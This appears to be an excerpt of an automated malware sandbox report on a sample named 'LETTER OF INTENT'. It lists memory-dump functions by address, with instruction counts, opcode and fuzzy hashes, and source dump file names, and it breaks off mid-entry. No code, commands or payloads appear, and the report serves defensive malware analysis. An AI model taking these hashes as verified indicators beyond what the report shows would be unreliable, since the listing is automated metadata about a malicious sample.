              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4395a1347bdc0164f8e028d2e9b19a195cc6ed0b3efe1a03250a8bea31e1d802
              • Instruction ID: 4b9cdd8586c553da20148ea12f095a20ccf2fbf9d35f4aca13b279b23e779f34
              • Opcode Fuzzy Hash: 4395a1347bdc0164f8e028d2e9b19a195cc6ed0b3efe1a03250a8bea31e1d802
              • Instruction Fuzzy Hash: 6731BFB0D01218DFEB20CF99C588BDEBBF5AB48318F25845AE508AB254C7B59945CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01921300 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4fd98bb84ba64c4d74f55fad1866b208807ce021e708f478bfc0159ab7c47763
              • Instruction ID: 5c471b8fdea7f16b39bf65e58d8162e8084dbcaa072fb60f52745f89cfc93bb9
              • Opcode Fuzzy Hash: 4fd98bb84ba64c4d74f55fad1866b208807ce021e708f478bfc0159ab7c47763
              • Instruction Fuzzy Hash: 7A215774E04219DFDB04DFE8C4446AEBBB6FB89300F108969D409A7758EB341E95CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0157D006 Relevance: .1, Instructions: 62COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245236370.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_157d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a2800197261f82d07a62b59905e9bc8aba412295c471a98301aa0b597eb5abaf
              • Instruction ID: b9ce5bbeca8eb7a3715523f3a54e8d24714d06cc3c4fed399d6330eca70c7524
              • Opcode Fuzzy Hash: a2800197261f82d07a62b59905e9bc8aba412295c471a98301aa0b597eb5abaf
              • Instruction Fuzzy Hash: 3D2159755093808FCB03CF24D994B15BF71AF46214F28C5AAD8498F6A7C33A985ACB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01922640 Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b6c0c5fb969b148cc70e35cd3868a42e42e20dba1a3382833126d7aa6b61a97
              • Instruction ID: 76c3670200ae0f0a549b6a59696d4c4c6d016d2b9be1d47eb553465374e2fffc
              • Opcode Fuzzy Hash: 8b6c0c5fb969b148cc70e35cd3868a42e42e20dba1a3382833126d7aa6b61a97
              • Instruction Fuzzy Hash: 62117331B042598BCF54DBBC94105FE77FAEFC8255B10057AC609EB648EB318D42CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925340 Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc24e61221f46f93d5774ad52ab6edbf2ec5fd589c595c9dec87b169ed463f2a
              • Instruction ID: 8ba21789d75fb04f8c15832a7c27b25d5a917f314136f03749472422802b44bd
              • Opcode Fuzzy Hash: fc24e61221f46f93d5774ad52ab6edbf2ec5fd589c595c9dec87b169ed463f2a
              • Instruction Fuzzy Hash: C1110271A002169B9B25DF7898449FFB7FAFFC8260B25852DE419D3384EF7089018750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0156D04F Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 875bd4112f38fd126d143d20172be31dfa01ec592d254e4a644e8970bb368cf1
              • Instruction ID: 951cebfabd5140a26d467b1b078776647b58b12d9c3814d1e2f36c1ac1d09b20
              • Opcode Fuzzy Hash: 875bd4112f38fd126d143d20172be31dfa01ec592d254e4a644e8970bb368cf1
              • Instruction Fuzzy Hash: 0D21DF72504280DFCF16CF44D9C4B1ABF72FB88314F2886A9D9484F216C33AD466CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0156D5A7 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
              • Instruction ID: 23f61305b0eaf98f51ddeca992dd6f73aaead65bff5c9ae04f09e26ddc0b20ea
              • Opcode Fuzzy Hash: b220346838b617afc249cfd39a22b485ab4c3c01a0c1e966dd926474b5198b28
              • Instruction Fuzzy Hash: 7E11B176504280CFCF12CF54D5C4B1ABF72FB84320F2486A9D8494F656C336D85ACBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01924FB8 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b8889f61b378c9e06f578b9f76bede20b6e16cac2d0cee8f695767bada4c51e
              • Instruction ID: 6fcb59453ab7cd9ded9b85ebd37cbc6f191391eeec438d037de10338d77660fb
              • Opcode Fuzzy Hash: 8b8889f61b378c9e06f578b9f76bede20b6e16cac2d0cee8f695767bada4c51e
              • Instruction Fuzzy Hash: 951103B59007588FDB10DF99C448BDEFBF8EB58324F14881AE959A7700C374A948CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019258ED Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 37c90ba55364d951d108b6d0484a074a52caa62765faa34628fb3c913ae5c9f2
              • Instruction ID: 3ab4c4c2c493ae017ce39cb6bcf628aa305290fb8d5f846a0cbd232e69a94d51
              • Opcode Fuzzy Hash: 37c90ba55364d951d108b6d0484a074a52caa62765faa34628fb3c913ae5c9f2
              • Instruction Fuzzy Hash: DE115274900209DFEB14CF5AC4487DDBFF1BF89360F65C159E8586B264C7704585CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925D52 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1f97fa93f0c7b7ae762987974f59aa04d16f5452620bb0c7b49d2ee822bafaf
              • Instruction ID: c8fee18f0effa2c7bba7a491fa97edf82afad428cc486daa63dd19741a77b77c
              • Opcode Fuzzy Hash: e1f97fa93f0c7b7ae762987974f59aa04d16f5452620bb0c7b49d2ee822bafaf
              • Instruction Fuzzy Hash: 4D1103B59007588FDB10CF99C548BDEBBF4AB58324F14881AD859B7700D374A949CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0156D8FD Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38d99bf521ded18091568f7529f75de9d8019c564412b39b1949e17abb8c2483
              • Instruction ID: 224050bd04ef47ba2604a8c7471dbd9708cbf3bdc290088bfe1fe625cdc0f45c
              • Opcode Fuzzy Hash: 38d99bf521ded18091568f7529f75de9d8019c564412b39b1949e17abb8c2483
              • Instruction Fuzzy Hash: B90184315047849AE7114AA9CC847AAFFECFB91668F088D59ED841F243D3759844C6F1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925601 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86e8b2040c93eea70dac0d8c1e6dbae0521294ccb63cdb26df018e4ec625b212
              • Instruction ID: b9722507e58cd7d172e562bbfd24d3277c82e45cf6600b6a22e588829f56f965
              • Opcode Fuzzy Hash: 86e8b2040c93eea70dac0d8c1e6dbae0521294ccb63cdb26df018e4ec625b212
              • Instruction Fuzzy Hash: 7E018C70C05309DFDB20DFA4E415AED7BBAEB45318F16449AD804EB290CB344E04CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019258F8 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 102f6fb4b71593357d61b6173464dfd600e293ba9e5c1570b7d70206c0c3ea5a
              • Instruction ID: cd7ba90c821852d7f8c80679cd4da69d7ba71ba0c6e3a805791bbcd737a2c0bf
              • Opcode Fuzzy Hash: 102f6fb4b71593357d61b6173464dfd600e293ba9e5c1570b7d70206c0c3ea5a
              • Instruction Fuzzy Hash: C9014074900218DFEB14CF5AC4447DEBFF5FB89360F65C129E918AB2A4C7708984CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925C38 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 42a640b904c7a386ab12e0dd1030fac373163864980800ac2440d214edd427f5
              • Instruction ID: f8720fd8ec4a345847bc359a722653161950f63ea240090b62ba356a5e338d52
              • Opcode Fuzzy Hash: 42a640b904c7a386ab12e0dd1030fac373163864980800ac2440d214edd427f5
              • Instruction Fuzzy Hash: F9F0B472B042205F9344CAADDC80C6BBBF9EFC926031585BAF409CB351DA308C02C7A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01926EE9 Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f2d797437dd3af17098f68e51d00d2fb3a4bf16a56661580ec97c3b2a3f808b1
              • Instruction ID: 662a58f1e6b1204e01945ff32c990d65c77bfec5542a6114dcdb213239ab906f
              • Opcode Fuzzy Hash: f2d797437dd3af17098f68e51d00d2fb3a4bf16a56661580ec97c3b2a3f808b1
              • Instruction Fuzzy Hash: 3701F2B4D19218AFCB40DFA8C544AADBFF0FF0A384F1585AAD858E7365E7304A51CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925B9E Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1d55d1cd6264d382c39eb6c5cd7c667f9ec389cb86afff0daf541aabb13f09ec
              • Instruction ID: d59aaee1e75dba5943e1d11d35fe7a1f88b0590009c4981982045b58eaa90f80
              • Opcode Fuzzy Hash: 1d55d1cd6264d382c39eb6c5cd7c667f9ec389cb86afff0daf541aabb13f09ec
              • Instruction Fuzzy Hash: 79011A70C00229DFEB10CFA9C4083EEBFB5AF48311F158619E828AB294D7744A85CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0156D8FC Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245211028.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_156d000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a53ce2050bb34f235905cffcc2e9a370225ae151672dae7b3a6d75158a8697a
              • Instruction ID: a99f12bbc2db130c832f499e9e245999402c8c06473933d31033efcf1ad63ecc
              • Opcode Fuzzy Hash: 8a53ce2050bb34f235905cffcc2e9a370225ae151672dae7b3a6d75158a8697a
              • Instruction Fuzzy Hash: 37F0C2714047849EE7108A09CCC4BA6FFACEB81634F18C85AED481F283C3799884CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019216F8 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fd5cea75490f7b933301f09325e9c4e3ffbe0517a559a2813c61a36a82bd24b
              • Instruction ID: b21619f3399ea7c6054edbd3e3a29e0091e951b16fb535c2a523f6a51980bafe
              • Opcode Fuzzy Hash: 2fd5cea75490f7b933301f09325e9c4e3ffbe0517a559a2813c61a36a82bd24b
              • Instruction Fuzzy Hash: CFF0CDB2C04258CFCB14CBE8C8144DCFBB0EF5A212B4944AAD10AEB661D7309811CB20
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925BA8 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 497449ef9c245e1c9b66cbb448028f7d4ce3149afda208aab8ffef614c239f54
              • Instruction ID: df9edcf5afd2dc1a25e22d6379cbc0c10586582a0bf2a7a39471ab783c38746a
              • Opcode Fuzzy Hash: 497449ef9c245e1c9b66cbb448028f7d4ce3149afda208aab8ffef614c239f54
              • Instruction Fuzzy Hash: B801EC70C00229DFEB14DF6AC4047EEBBF5EF44351F118625E818AB194D7744A44CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01921DB0 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3491545f2afc0a60ec69c386f87fd417fa0c08a21cd7ffaa1e3109cf1c37f165
              • Instruction ID: b78044432c5cfbc467ab19fb56c100d4a4a18259c40d1f0ce4d216c858d65270
              • Opcode Fuzzy Hash: 3491545f2afc0a60ec69c386f87fd417fa0c08a21cd7ffaa1e3109cf1c37f165
              • Instruction Fuzzy Hash: 00F0AC3904A3919FC78397785CA44C67FA0DE47624706C9DBC0C58B073D9794C4A97A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01921424 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 525e582dd670070f79359301ebad7d6cc50f25a8d7abebeeec57f22f41186c52
              • Instruction ID: 70dc6f987fd0f2dee68c93fc16a7d8d6ddd8c5ae4e59cb64f677f4f13698409a
              • Opcode Fuzzy Hash: 525e582dd670070f79359301ebad7d6cc50f25a8d7abebeeec57f22f41186c52
              • Instruction Fuzzy Hash: FDF02471D09248EFC704CFA4D89156CBF75FF42302F0485AED44857255D7308A69C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920448 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 259480472664accfab67ab32b7a8883704e52b0dded0d914e52b8d982d36bba8
              • Instruction ID: 81fa5e34266ada339fa3d263c89ab5f29ffbdfb51c8e5ddae822839310f8109a
              • Opcode Fuzzy Hash: 259480472664accfab67ab32b7a8883704e52b0dded0d914e52b8d982d36bba8
              • Instruction Fuzzy Hash: 04F01274D01208EFCB58EFB8E04969DBBB6FB8A315F5095A9C419AB254EB315A84CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925C48 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 40ada81f8970d55f95ad2b7d7a21c19304d62072e012a15bf677ec38aace8282
              • Instruction ID: b3b03372be5cc5801c25f7ef1da36a7e75728d8bac5cbb86fadcd7159b8766a1
              • Opcode Fuzzy Hash: 40ada81f8970d55f95ad2b7d7a21c19304d62072e012a15bf677ec38aace8282
              • Instruction Fuzzy Hash: 39E03972B001246F5314DAAAD884C6BBBEEEBCD664355817AF50DCB310DA309C0186A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920929 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c6e208e0316ed6f5752aae350ad20b0b0114e42506e8060f5b757ae47920148a
              • Instruction ID: 6b2d67de2853fd309287e4aa18ea16a7ef8ccf444b5f1f8e0f7a8f5dc3f09deb
              • Opcode Fuzzy Hash: c6e208e0316ed6f5752aae350ad20b0b0114e42506e8060f5b757ae47920148a
              • Instruction Fuzzy Hash: FFF0F470D042099FCB54DFA8E8056ADBFF0BB4A300F1095AAD428A7255EB700A05DF01
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01926EF8 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5c089a49b1c226b167455667873b85b1cb80b973e80d2076292b068686ca67b
              • Instruction ID: 7dbf76f9f072e0595119adf503e3552e71c4eda3419703b744ef6cff6258d6a0
              • Opcode Fuzzy Hash: f5c089a49b1c226b167455667873b85b1cb80b973e80d2076292b068686ca67b
              • Instruction Fuzzy Hash: F7F0AFB8D04218AFCB40DFA9D584AADBBF5EF48304F5095AAD819A7314E7305A51CF81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192B668 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 13b81a108e2ee6906e33cfaa333df4854abba427f517ee514979d694e660dcc3
              • Instruction ID: 9a5834d1437151413cc1cdebd7365c975774964858c2280d26dada35ec564f13
              • Opcode Fuzzy Hash: 13b81a108e2ee6906e33cfaa333df4854abba427f517ee514979d694e660dcc3
              • Instruction Fuzzy Hash: 96F0FEB0E0421E9FDB54DFA9D841AAEBFF4FB48310F1045A9D919E7304D77095008F90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920AA6 Relevance: .0, Instructions: 27COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ccc08dcdffe36c91cf4e687abfbe89633e71e42126f3d02bc65ce33d730abfa
              • Instruction ID: 6124894dc174a372cbe38eef3eb6837c9879bf51db4387853584f72be964f2aa
              • Opcode Fuzzy Hash: 4ccc08dcdffe36c91cf4e687abfbe89633e71e42126f3d02bc65ce33d730abfa
              • Instruction Fuzzy Hash: 1FF0F830951204DFCB54DFA8E448E9DBFF8FF05719F1585A9D8089B265D7709D84CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01920AA8 Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 725080315d4e25aed77e6a0fc0fff2eab993f98b9ba05be04bdddcde9cc8294a
              • Instruction ID: 1583cf6ecd69edd85510e59f933cf9b1aaba42d5183df7d8e8363eb822da1c0f
              • Opcode Fuzzy Hash: 725080315d4e25aed77e6a0fc0fff2eab993f98b9ba05be04bdddcde9cc8294a
              • Instruction Fuzzy Hash: 91F03930911208DFC740EFA9E488E9DBBF8FF04709F5589A8E8089B365E7709E84CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019213D7 Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7eb32d642634f1bf3c11c5b85b720cb09d3264270c9c9aea147b262b067b27c2
              • Instruction ID: 8cad2045543bb692b9a0b026500d4efc826925b1388a8e804d8652d29804b6fb
              • Opcode Fuzzy Hash: 7eb32d642634f1bf3c11c5b85b720cb09d3264270c9c9aea147b262b067b27c2
              • Instruction Fuzzy Hash: 1DF0E530C0A208DFC704DFA0D6845ACBF75FF42311F0495AAE8441B255D7304999CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019204A8 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 807be1ba8dee3bbaefb5f21ffe67296e508cbe35b7491409a448c11fc0ce43cc
              • Instruction ID: 0fbca03f92884018aa820dd7ecdcfdfea11ea74744b7accde52182898db41546
              • Opcode Fuzzy Hash: 807be1ba8dee3bbaefb5f21ffe67296e508cbe35b7491409a448c11fc0ce43cc
              • Instruction Fuzzy Hash: 57E08C3084A384AFC711CBB8A8516AEBFB8BF83304F0682EBC48896552D3311D55CB51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192A820 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3fc011cfc25d7954223ab0b03de47a9d0b7a99a25c9948b0fab5f8816e9f2eae
              • Instruction ID: 8fb6f5f69cc75ea97b3eac482e7a82278d95a25f1f679f3a14f4a56f7ebd0cad
              • Opcode Fuzzy Hash: 3fc011cfc25d7954223ab0b03de47a9d0b7a99a25c9948b0fab5f8816e9f2eae
              • Instruction Fuzzy Hash: FFE0C270D05308EFC714DFB49904B9DBBB9AB01305F1050BCC90467244E7314681CB82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 019213E8 Relevance: .0, Instructions: 21COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44588811a61bb6b50e1222f1c961d08555dc3a5bbb061b89aea1e1e9318f2696
              • Instruction ID: 18c29c88f3c4ddcb828016dd5ba8d9ec92c476ea07a52046908ca9ac0499b5fe
              • Opcode Fuzzy Hash: 44588811a61bb6b50e1222f1c961d08555dc3a5bbb061b89aea1e1e9318f2696
              • Instruction Fuzzy Hash: ACE04F30C05208AFC714DF94E9459ADBF7ABB41301F109169E80427254DB319A95DB85
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01925610 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 029df0095d84ec01ccaa63ce63e25a3d35689e54e00b6e2362a789d8b0b51806
              • Instruction ID: 469117f5ccdd99e3d6e1d8f43c20ba6c2023e2d6963ef5676dd877d85db0581a
              • Opcode Fuzzy Hash: 029df0095d84ec01ccaa63ce63e25a3d35689e54e00b6e2362a789d8b0b51806
              • Instruction Fuzzy Hash: ADE08630901209EFCB50EFA4F8019AEB7BDFB48314B105499D809D7310EB356E049F91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0192B610 Relevance: .0, Instructions: 18COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed54cd1ffa11d4fe66b2c6e11964c44ce59e0d4041d517517d209f64c04f522b
              • Instruction ID: a0da0e1603c4d9e082e07f50430f8ab4335261d5e294c00db60eec6d58002889
